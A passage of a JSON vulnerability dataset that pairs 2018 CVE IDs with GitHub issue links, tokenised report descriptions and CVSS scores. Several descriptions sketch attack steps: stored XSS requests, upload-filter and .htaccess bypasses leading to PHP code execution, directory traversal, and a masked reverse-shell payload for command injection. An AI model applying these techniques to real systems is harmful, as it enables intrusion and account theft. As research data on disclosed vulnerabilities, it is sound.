  25189. "description": "APITAG heap buffer overflow parsing running wasm file causing crash. FILETAG",
  25190. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25191. "severity": "HIGH",
  25192. "baseScore": 8.8,
  25193. "impactScore": 5.9,
  25194. "exploitabilityScore": 2.8
  25195. },
  25196. {
  25197. "CVE_ID": "CVE-2018-16769",
  25198. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/99",
  25199. "Issue_Url_new": "https://github.com/wavm/wavm/issues/99",
  25200. "Repo_new": "wavm/wavm",
  25201. "Issue_Created_At": "2018-07-26T13:13:09Z",
  25202. "description": "APITAG parsing running wasm file causing crash in runtime. FILETAG",
  25203. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25204. "severity": "HIGH",
  25205. "baseScore": 8.8,
  25206. "impactScore": 5.9,
  25207. "exploitabilityScore": 2.8
  25208. },
  25209. {
  25210. "CVE_ID": "CVE-2018-16770",
  25211. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/100",
  25212. "Issue_Url_new": "https://github.com/wavm/wavm/issues/100",
  25213. "Repo_new": "wavm/wavm",
  25214. "Issue_Created_At": "2018-07-26T13:13:49Z",
  25215. "description": "APITAG long, void const ) parsing running wasm file causing crash. FILETAG",
  25216. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25217. "severity": "HIGH",
  25218. "baseScore": 8.8,
  25219. "impactScore": 5.9,
  25220. "exploitabilityScore": 2.8
  25221. },
  25222. {
  25223. "CVE_ID": "CVE-2018-16771",
  25224. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/46",
  25225. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/46",
  25226. "Repo_new": "havok89/hoosk",
  25227. "Issue_Created_At": "2018-08-19T00:58:36Z",
  25228. "description": "Arbitrary code execution on NUMBERTAG When install the Hoosk\uff0cyou can put the code APITAG in the APITAG the APITAG can get the phpinfo page. FILETAG FILETAG",
  25229. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25230. "severity": "CRITICAL",
  25231. "baseScore": 9.8,
  25232. "impactScore": 5.9,
  25233. "exploitabilityScore": 3.9
  25234. },
  25235. {
  25236. "CVE_ID": "CVE-2018-16772",
  25237. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/47",
  25238. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/47",
  25239. "Repo_new": "havok89/hoosk",
  25240. "Issue_Created_At": "2018-08-19T06:35:32Z",
  25241. "description": "XSS on Hoosk NUMBERTAG the xss is on the page PATHTAG a text new page, fill the ERRORTAG in the APITAG Title (this is displayed on navigation menus)' field FILETAG FILETAG",
  25242. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25243. "severity": "MEDIUM",
  25244. "baseScore": 4.8,
  25245. "impactScore": 2.7,
  25246. "exploitabilityScore": 1.7
  25247. },
  25248. {
  25249. "CVE_ID": "CVE-2018-16773",
  25250. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/6",
  25251. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/6",
  25252. "Repo_new": "teameasy/easycms",
  25253. "Issue_Created_At": "2018-08-24T10:00:54Z",
  25254. "description": "There is an XSS with APITAG; the POST file is ERRORTAG FILETAG. When we fill the payload in it, close APITAG, and click submit again, the XSS will trigger. FILETAG",
  25255. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25256. "severity": "MEDIUM",
  25257. "baseScore": 4.8,
  25258. "impactScore": 2.7,
  25259. "exploitabilityScore": 1.7
  25260. },
  25261. {
  25262. "CVE_ID": "CVE-2018-16774",
  25263. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/6",
  25264. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/6",
  25265. "Repo_new": "neeke/hongcms",
  25266. "Issue_Created_At": "2018-07-31T02:09:30Z",
  25267. "description": "APITAG NUMBERTAG Arbitrary file deletion. APITAG need to access the page \u201c URLTAG \u201d. Then,delete one of the language. Lastly,use the burpsuit to change the file which you want to delete. FILETAG FILETAG FILETAG",
  25268. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  25269. "severity": "HIGH",
  25270. "baseScore": 7.5,
  25271. "impactScore": 3.6,
  25272. "exploitabilityScore": 3.9
  25273. },
  25274. {
  25275. "CVE_ID": "CVE-2018-16775",
  25276. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/3",
  25277. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/3",
  25278. "Repo_new": "victoralagwu/cmssite",
  25279. "Issue_Created_At": "2018-08-22T07:02:19Z",
  25280. "description": "A cross site scripting (XSS) vulnerability storage. Wonderful works of CMS! I find the security issues on the management settings website: A cross site scripting (XSS) vulnerability is stored in the site name field on the \"ADD\" button under the APITAG menu in APITAG No NUMBERTAG allowing remote attackers to inject arbitrary Web scripts or HTML via fine site names via WITYCMS/ADMIN authenticated HTTP requests FILETAG FILETAG You can insert JS code into the input box when you add the APITAG column, and the code will be executed after saving, which will affect the security of your \"cms\" work Oh!! FILETAG When you query data, you should do a good job of filtering keywords.",
  25281. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25282. "severity": "MEDIUM",
  25283. "baseScore": 4.8,
  25284. "impactScore": 2.7,
  25285. "exploitabilityScore": 1.7
  25286. },
  25287. {
  25288. "CVE_ID": "CVE-2018-16776",
  25289. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/154",
  25290. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/154",
  25291. "Repo_new": "creatiwity/witycms",
  25292. "Issue_Created_At": "2018-08-20T09:39:32Z",
  25293. "description": "Persistent XSS on APITAG name' field (config FILETAG If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser .",
  25294. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25295. "severity": "MEDIUM",
  25296. "baseScore": 4.8,
  25297. "impactScore": 2.7,
  25298. "exploitabilityScore": 1.7
  25299. },
  25300. {
  25301. "CVE_ID": "CVE-2018-16779",
  25302. "Issue_Url_old": "https://github.com/hukouhome/blogCMS/issues/1",
  25303. "Issue_Url_new": "https://github.com/town-chen/blogcms/issues/1",
  25304. "Repo_new": "town-chen/blogcms",
  25305. "Issue_Created_At": "2018-08-15T13:26:37Z",
  25306. "description": "There is a stored XSS vulnerability in the blog comment interface . Explain: A cross site scripting (XSS) vulnerability in APITAG may allow a remote attacker to inject arbitrary Web scripts through the source editor, which may result in an attacker obtaining cookies from other administrators and logging into a Web site backend account. First, browse the website and click on a blog to comment on it. FILETAG According to the next picture, the comment contains malicious APITAG code. FILETAG Now, use the administrator's identity to log in to the website backstage and view the comments. FILETAG The background management interface will pop up the administrator's cookie. FILETAG Impact: Any user leaving a message on a Web site can use it to perform an operation and may cause an administrator's cookies to be hijacked",
  25307. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25308. "severity": "MEDIUM",
  25309. "baseScore": 6.1,
  25310. "impactScore": 2.7,
  25311. "exploitabilityScore": 2.8
  25312. },
  25313. {
  25314. "CVE_ID": "CVE-2018-16780",
  25315. "Issue_Url_old": "https://github.com/dusaurabh/PHP/issues/1",
  25316. "Issue_Url_new": "https://github.com/dusaurabh/php/issues/1",
  25317. "Repo_new": "dusaurabh/php",
  25318. "Issue_Created_At": "2018-08-12T13:38:10Z",
  25319. "description": "There is a storage XSS vulnerability in the blog comment interface. Explain: A cross site scripting (XSS) vulnerability in APITAG may allow a remote attacker (user) to inject arbitrary Web scripts through the source editor, which will cause the attacker (user) to obtain the cookies of other users and log in to the accounts of other users. First use the account password to log in to the blog. FILETAG When I comment on one of the blogs,I insert malicious code into it. FILETAG The website does not filter characters, and malicious code is directly transmitted to the website management interface. FILETAG When the administrator clicks the Approve option, the malicious code will be executed. FILETAG Now if an ordinary user sees this comment, his cookie will be stolen. FILETAG Impact: This can be used by any user leaving a message on a Web site to perform an operation and may result in hijacking any user's cookie",
  25320. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25321. "severity": "MEDIUM",
  25322. "baseScore": 5.4,
  25323. "impactScore": 2.7,
  25324. "exploitabilityScore": 2.3
  25325. },
  25326. {
  25327. "CVE_ID": "CVE-2018-16781",
  25328. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/6",
  25329. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/6",
  25330. "Repo_new": "rockcarry/ffjpeg",
  25331. "Issue_Created_At": "2018-08-21T08:28:26Z",
  25332. "description": "APITAG Support && FPE on unknown address. Now this project can only build on MS Windows with gcc/clang, I can't build it. So I write a FILETAG FILETAG to compile it on Linux. But when I run the binary I got this: ERRORTAG",
  25333. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25334. "severity": "MEDIUM",
  25335. "baseScore": 6.5,
  25336. "impactScore": 3.6,
  25337. "exploitabilityScore": 2.8
  25338. },
  25339. {
  25340. "CVE_ID": "CVE-2018-16782",
  25341. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/35",
  25342. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/35",
  25343. "Repo_new": "jsummers/imageworsener",
  25344. "Issue_Created_At": "2018-09-06T07:56:06Z",
  25345. "description": "stack buffer overflow. /my/imageworsener ./imagew w NUMBERTAG FILETAG FILETAG FILETAG \u2192 out.bmp APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG acb5f at pc NUMBERTAG d2dc bp NUMBERTAG ffd NUMBERTAG ac NUMBERTAG sp NUMBERTAG ffd NUMBERTAG ac NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG acb5f thread T NUMBERTAG d2db ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG b1db8 ( PATHTAG NUMBERTAG e ( PATHTAG NUMBERTAG f1f NUMBERTAG c1fb NUMBERTAG PATHTAG NUMBERTAG b8b9 ( PATHTAG ) Address NUMBERTAG ffd NUMBERTAG acb5f is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a9b1f ( PATHTAG ) This frame has NUMBERTAG object(s): FILETAG",
  25346. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25347. "severity": "HIGH",
  25348. "baseScore": 8.8,
  25349. "impactScore": 5.9,
  25350. "exploitabilityScore": 2.8
  25351. },
  25352. {
  25353. "CVE_ID": "CVE-2018-16784",
  25354. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/3",
  25355. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/3",
  25356. "Repo_new": "ky-j/dedecms",
  25357. "Issue_Created_At": "2018-09-11T08:41:11Z",
  25358. "description": "XML injection vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. . Description: XML injection vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. FILETAG any problem, mailto: root APITAG",
  25359. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25360. "severity": "HIGH",
  25361. "baseScore": 7.2,
  25362. "impactScore": 5.9,
  25363. "exploitabilityScore": 1.2
  25364. },
  25365. {
  25366. "CVE_ID": "CVE-2018-16785",
  25367. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/4",
  25368. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/4",
  25369. "Repo_new": "ky-j/dedecms",
  25370. "Issue_Created_At": "2018-09-11T08:49:57Z",
  25371. "description": "File writing vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to upload script file to obtain webshell. . Description: File writing vulnerability exists in the file of APITAG NUMBERTAG SP2 version, which can be utilized by attackers to create script file to obtain webshell. FILETAG",
  25372. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  25373. "severity": "HIGH",
  25374. "baseScore": 8.8,
  25375. "impactScore": 5.9,
  25376. "exploitabilityScore": 2.8
  25377. },
  25378. {
  25379. "CVE_ID": "CVE-2018-16805",
  25380. "Issue_Url_old": "https://github.com/b3log/solo/issues/12501",
  25381. "Issue_Url_new": "https://github.com/b3log/solo/issues/12501",
  25382. "Repo_new": "b3log/solo",
  25383. "Issue_Created_At": "2018-09-10T07:38:25Z",
  25384. "description": "\u540e\u53f0\u8fde\u63a5\u7ba1\u7406\u5b58\u5728xss . A cross site scripting (XSS) vulnerability found in the Input page under the APITAG Articles\" menu in b3log NUMBERTAG with an ID of APITAG stored in the \"link\" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a APITAG authenticated HTTP request. playload\uff1a FILETAG \u201c APITAG APITAG alert NUMBERTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG b3log APITAG skin=\"\"; APITAG APITAG Connection: close APITAG URLTAG APITAG APITAG FILETAG FILETAG FILETAG FILETAG",
  25385. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25386. "severity": "MEDIUM",
  25387. "baseScore": 4.8,
  25388. "impactScore": 2.7,
  25389. "exploitabilityScore": 1.7
  25390. },
  25391. {
  25392. "CVE_ID": "CVE-2018-16808",
  25393. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/9449",
  25394. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/9449",
  25395. "Repo_new": "dolibarr/dolibarr",
  25396. "Issue_Created_At": "2018-09-09T15:38:30Z",
  25397. "description": "APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Payload explanation: We escape from the current td or textarea entity to inject an object entity. We also need to create another td or textarea element since there is a APITAG or APITAG to be associated with. The base NUMBERTAG APITAG stands for APITAG There are some filters used to block XSS like onload, onerror, etc. So using base NUMBERTAG still does the job; it is one example of many NUMBERTAG RISK ======== If exploited, that vulnerability can allow an attacker to steal a user session, even the super admin's, if the super admin is designated as a validator of that billing. It can also be used to make users perform unwanted actions on the application, exfiltrate private data to an unknown destination, etc NUMBERTAG SOLUTION =========== Sanitize the query properly before processing the request. Don't rely on a blacklist to protect the application. It is recommended to use htmlentities($parameter, ENT_QUOTE | ENT_HTML5, \"UTF NUMBERTAG true NUMBERTAG REPORT TIMELINE NUMBERTAG Discovery of the vulnerability NUMBERTAG Explanation of the vulnerability NUMBERTAG Determine all of the versions vulnerable to the exploit NUMBERTAG Send full vulnerability details to Dolibarr's developers",
  25398. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25399. "severity": "MEDIUM",
  25400. "baseScore": 6.1,
  25401. "impactScore": 2.7,
  25402. "exploitabilityScore": 2.8
  25403. },
  25404. {
  25405. "CVE_ID": "CVE-2018-16819",
  25406. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/456",
  25407. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/456",
  25408. "Repo_new": "monstra-cms/monstra",
  25409. "Issue_Created_At": "2018-08-29T14:51:26Z",
  25410. "description": "any file delete. Vulnerable URL\uff1a URLTAG touch FILETAG in PATHTAG visit url\uff1a URLTAG the FILETAG will delete APITAG",
  25411. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  25412. "severity": "MEDIUM",
  25413. "baseScore": 4.9,
  25414. "impactScore": 3.6,
  25415. "exploitabilityScore": 1.2
  25416. },
  25417. {
  25418. "CVE_ID": "CVE-2018-16820",
  25419. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/457",
  25420. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/457",
  25421. "Repo_new": "monstra-cms/monstra",
  25422. "Issue_Created_At": "2018-08-29T15:35:37Z",
  25423. "description": "directory traversal in Monstra dev. visit\uff1a FILETAG can traverse any directory. example\uff1a APITAG request\uff1a CODETAG response\uff1a APITAG",
  25424. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  25425. "severity": "HIGH",
  25426. "baseScore": 7.5,
  25427. "impactScore": 3.6,
  25428. "exploitabilityScore": 3.9
  25429. },
  25430. {
  25431. "CVE_ID": "CVE-2018-16831",
  25432. "Issue_Url_old": "https://github.com/smarty-php/smarty/issues/486",
  25433. "Issue_Url_new": "https://github.com/smarty-php/smarty/issues/486",
  25434. "Repo_new": "smarty-php/smarty",
  25435. "Issue_Created_At": "2018-09-05T09:49:07Z",
  25436. "description": "Even if you enable security, trusted_dir can be bypassed. If you enable security, $trusted_dir is an array of all directories that are considered trusted. Trusted directories are where you keep php scripts that are executed directly from the templates. Attackers can use ../ to bypass the dir; if they can edit the templates, they can read any file they want, just using {include PATHTAG",
  25437. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  25438. "severity": "MEDIUM",
  25439. "baseScore": 5.9,
  25440. "impactScore": 3.6,
  25441. "exploitabilityScore": 2.2
  25442. },
  25443. {
  25444. "CVE_ID": "CVE-2018-16832",
  25445. "Issue_Url_old": "https://github.com/ysrc/xunfeng/issues/177",
  25446. "Issue_Url_new": "https://github.com/ysrc/xunfeng/issues/177",
  25447. "Repo_new": "ysrc/xunfeng",
  25448. "Issue_Created_At": "2018-09-11T12:04:26Z",
  25449. "description": "Found CSRF vulnerability. The APITAG measures have some defects and an attacker can bypass them with Flash, by adding the APITAG header. After the administrator has logged in, open the following page: a malicious payload could be injected into the configuration: APITAG Flash source: ERRORTAG The reason for the vulnerability is in PATHTAG line NUMBERTAG: the APITAG can be overwritten by APITAG , which is the default behavior of werkzeug wsgi.",
  25450. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  25451. "severity": "MEDIUM",
  25452. "baseScore": 6.5,
  25453. "impactScore": 3.6,
  25454. "exploitabilityScore": 2.8
  25455. },
  25456. {
  25457. "CVE_ID": "CVE-2018-16951",
  25458. "Issue_Url_old": "https://github.com/ysrc/xunfeng/issues/176",
  25459. "Issue_Url_new": "https://github.com/ysrc/xunfeng/issues/176",
  25460. "Repo_new": "ysrc/xunfeng",
  25461. "Issue_Created_At": "2018-09-11T07:48:59Z",
  25462. "description": "Found command injection vulnerability. An attacker can execute arbitrary commands on the xunfeng server after login, the default account is ERRORTAG . Use the following python function the generate the payload for bouncing a command shell, paste it to APITAG > APITAG > APITAG > APITAG and set scan mode to APITAG (change APITAG may shorten the waiting time). CODETAG The reason for the vulnerability is in APITAG line NUMBERTAG which miss to translate the backquote symbol APITAG `. Demo: URLTAG URLTAG Exploit: URLTAG URLTAG",
  25463. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  25464. "severity": "HIGH",
  25465. "baseScore": 8.0,
  25466. "impactScore": 5.9,
  25467. "exploitabilityScore": 2.1
  25468. },
  25469. {
  25470. "CVE_ID": "CVE-2018-16974",
  25471. "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/287",
  25472. "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/287",
  25473. "Repo_new": "jbroadway/elefant",
  25474. "Issue_Created_At": "2018-08-29T11:47:42Z",
  25475. "description": "A PHP Code Execution Vulnerability in PATHTAG at NUMBERTAG I found a php code execution vulnerability in PATHTAG at NUMBERTAG FILETAG Sep NUMBERTAG delete APITAG use delete file api to delete .htaccess POST PATHTAG NUMBERTAG php file upload by pass Use the Windows feature to add spaces after the file name. POC: delete .htaccess success APITAG upload php file success APITAG php code execution APITAG APITAG white list author by:xijun. EMAILTAG .cn",
  25476. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25477. "severity": "CRITICAL",
  25478. "baseScore": 9.8,
  25479. "impactScore": 5.9,
  25480. "exploitabilityScore": 3.9
  25481. },
  25482. {
  25483. "CVE_ID": "CVE-2018-16975",
  25484. "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/286",
  25485. "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/286",
  25486. "Repo_new": "jbroadway/elefant",
  25487. "Issue_Created_At": "2018-08-29T08:52:05Z",
  25488. "description": "A PHP Code Execution Vulnerability in PATHTAG at NUMBERTAG I found a php code execution vulnerability in PATHTAG at NUMBERTAG URL: URLTAG POC NUMBERTAG New Stylesheet Name input a php file extension,like FILETAG NUMBERTAG style input your php code ,like APITAG and you will see the php code execution just like the picture APITAG Suggestion: Stylesheet limit php code author by: xijun. EMAILTAG .cn",
  25489. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25490. "severity": "CRITICAL",
  25491. "baseScore": 9.8,
  25492. "impactScore": 5.9,
  25493. "exploitabilityScore": 3.9
  25494. },
  25495. {
  25496. "CVE_ID": "CVE-2018-16977",
  25497. "Issue_Url_old": "https://github.com/howchen/howchen/issues/4",
  25498. "Issue_Url_new": "https://github.com/howchen/howchen/issues/4",
  25499. "Repo_new": "howchen/howchen",
  25500. "Issue_Created_At": "2018-09-07T06:38:40Z",
  25501. "description": "Monstra CMS NUMBERTAG allows attackers to obtain sensitive information. visit url: ERRORTAG the response error message discloses sensitive information ERRORTAG",
  25502. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  25503. "severity": "MEDIUM",
  25504. "baseScore": 5.3,
  25505. "impactScore": 1.4,
  25506. "exploitabilityScore": 3.9
  25507. },
  25508. {
  25509. "CVE_ID": "CVE-2018-16980",
  25510. "Issue_Url_old": "https://github.com/dotCMS/core/issues/15274",
  25511. "Issue_Url_new": "https://github.com/dotcms/core/issues/15274",
  25512. "Repo_new": "dotcms/core",
  25513. "Issue_Created_At": "2018-09-12T10:28:46Z",
  25514. "description": "xss in APITAG Current Behavior dotcms NUMBERTAG has an xss in PATHTAG, parameters APITAG and \"inode\". Steps to Reproduce (for bugs): just visit the url: APITAG FILETAG How to fix: URLTAG",
  25515. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25516. "severity": "MEDIUM",
  25517. "baseScore": 6.1,
  25518. "impactScore": 2.7,
  25519. "exploitabilityScore": 2.8
  25520. },
  25521. {
  25522. "CVE_ID": "CVE-2018-16981",
  25523. "Issue_Url_old": "https://github.com/nothings/stb/issues/656",
  25524. "Issue_Url_new": "https://github.com/nothings/stb/issues/656",
  25525. "Repo_new": "nothings/stb",
  25526. "Issue_Created_At": "2018-09-12T02:48:26Z",
  25527. "description": "heap buffer overflow in stbi__out_gif_code. Using the following code we are able to trigger a heap buffer overflow on the attached file FILETAG . ERRORTAG Command line: ERRORTAG Output: ERRORTAG",
  25528. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25529. "severity": "HIGH",
  25530. "baseScore": 8.8,
  25531. "impactScore": 5.9,
  25532. "exploitabilityScore": 2.8
  25533. },
  25534. {
  25535. "CVE_ID": "CVE-2018-16982",
  25536. "Issue_Url_old": "https://github.com/BYVoid/OpenCC/issues/303",
  25537. "Issue_Url_new": "https://github.com/byvoid/opencc/issues/303",
  25538. "Repo_new": "byvoid/opencc",
  25539. "Issue_Created_At": "2018-09-13T00:30:49Z",
  25540. "description": "Denial of Service in APITAG Hi, I am a security fan. And I found an out of bound pointer in APITAG which could lead to a segmentation fault APITAG of Service if some applications use this library). In APITAG there are two offsets which are APITAG and APITAG So if I provide a .ocd file where I can control these two offsets, I can actually make them really big. So the pointers (const char key and const char value) will point to an unreadable place. I've attached the POCs for these two pointers. Hope you can respond soon :) FILETAG",
  25541. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25542. "severity": "MEDIUM",
  25543. "baseScore": 5.5,
  25544. "impactScore": 3.6,
  25545. "exploitabilityScore": 1.8
  25546. },
  25547. {
  25548. "CVE_ID": "CVE-2018-16985",
  25549. "Issue_Url_old": "https://github.com/inikep/lizard/issues/18",
  25550. "Issue_Url_new": "https://github.com/inikep/lizard/issues/18",
  25551. "Repo_new": "inikep/lizard",
  25552. "Issue_Created_At": "2018-09-07T07:34:35Z",
  25553. "description": "NULL pointer dereference in lz NUMBERTAG lz5_compress). Hello. I found a NULL pointer dereference in LZ NUMBERTAG Please confirm. Thanks. Summary OS: ubuntu NUMBERTAG bit version: Lz NUMBERTAG POC Download: Lz5 poc null pointer dereference URLTAG test code: APITAG with APITAG details: ERRORTAG It may cause a crash or denial of service.",
  25554. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  25555. "severity": "HIGH",
  25556. "baseScore": 7.5,
  25557. "impactScore": 3.6,
  25558. "exploitabilityScore": 3.9
  25559. },
  25560. {
  25561. "CVE_ID": "CVE-2018-17024",
  25562. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/452",
  25563. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/452",
  25564. "Repo_new": "monstra-cms/monstra",
  25565. "Issue_Created_At": "2018-08-16T12:35:58Z",
  25566. "description": "XSS APITAG in Monstra dev. Affected software: Monstra dev Type of vulnerability: XSS APITAG Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login into the monstra dev cms. Step2: URL: URLTAG Go to the content and choose pages and then create a new page with malicious javascript. FILETAG Step3: Here as the xss got executed for name parameter in new page. URL: URLTAG FILETAG",
  25567. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25568. "severity": "MEDIUM",
  25569. "baseScore": 4.8,
  25570. "impactScore": 2.7,
  25571. "exploitabilityScore": 1.7
  25572. },
  25573. {
  25574. "CVE_ID": "CVE-2018-17026",
  25575. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/25",
  25576. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/25",
  25577. "Repo_new": "bg5sbk/minicms",
  25578. "Issue_Created_At": "2018-09-12T12:32:56Z",
  25579. "description": "ERRORTAG page have another Stored XSS Vulnerability. Monstra version NUMBERTAG Exploit uri > URLTAG Parameter > page_meta_title POC: POST PATHTAG ERRORTAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: admin_username=admin; APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG ERRORTAG APITAG ERRORTAG +&page_name=error ERRORTAG APITAG ERRORTAG APITAG NUMBERTAG A NUMBERTAG A NUMBERTAG",
  25580. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  25581. "severity": "MEDIUM",
  25582. "baseScore": 4.8,
  25583. "impactScore": 2.7,
  25584. "exploitabilityScore": 1.7
  25585. },
  25586. {
  25587. "CVE_ID": "CVE-2018-17030",
  25588. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/342",
  25589. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/342",
  25590. "Repo_new": "bigtreecms/bigtree-cms",
  25591. "Issue_Created_At": "2018-09-13T01:34:02Z",
  25592. "description": "Authenticated Remote Code Execution. FILE: APITAG APITAG We can set APITAG as APITAG and use the \"\\e\" modifier to execute arbitrary code. poc: FILETAG",
  25593. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  25594. "severity": "HIGH",
  25595. "baseScore": 7.5,
  25596. "impactScore": 5.9,
  25597. "exploitabilityScore": 1.6
  25598. },
  25599. {
  25600. "CVE_ID": "CVE-2018-17031",
  25601. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5397",
  25602. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5397",
  25603. "Repo_new": "gogs/gogs",
  25604. "Issue_Created_At": "2018-09-03T07:46:52Z",
  25605. "description": "Stored XSS vulnerability in viewing raw file. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG Patch: add the X-Content-Type-Options: nosniff header to prevent the browser from MIME type sniffing, just as github / gitlab do. Discoverer: Wenxu Wu of Tencent's Xuanwu Lab",
